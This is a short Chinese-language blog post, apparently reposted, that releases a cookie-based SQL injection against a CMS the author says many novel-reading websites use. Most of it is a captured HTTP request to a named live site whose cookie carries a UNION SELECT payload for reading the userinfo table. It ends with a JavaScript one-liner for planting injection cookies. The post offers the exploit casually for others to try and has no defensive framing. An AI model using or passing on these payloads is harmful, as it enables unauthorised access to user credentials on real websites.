放我这好长时间了 当初好象是小乐B给俺的 拿到以后以为能是个很好的0day 结果太不好利用
只能cookie注射 小JB志研究了一会告诉俺只能cookie 我又本地架设了一个 确实是只能用cookie注射来猜密码 确实能猜出来
本地架设的 知道表名猜的也快~ 再放着好张毛了 扔出来玩吧 好多小说网站用的这套程序~ 抓包数据如下
POST /adurl.asp HTTP/1.1
Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.koobook.com
Content-Length: 4
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cnzz02=53; rtime=0; ltime=1187688366927; cnzz_eid=77370945-; ASPSESSIONIDSQASSCDR=JPIPGFCBMKKKGNAGPILAFOMJ;
CnEndWeb%5FUser=log%5Fsex=%CF%C8%C9%FA&log%5FUserName=thenines&log%5FUserID=476%20and%201=2%20union%20select%20id%2C5%2C7%
20from%20userinfo%20where%20id%3d2
注射语句就是cookie了 不会的百度一下找cookie注射语句 javascript:alert(document.cookie="id="+escape("1 and 1=1"))
转载于:https://blog.51cto.com/linkboy/297675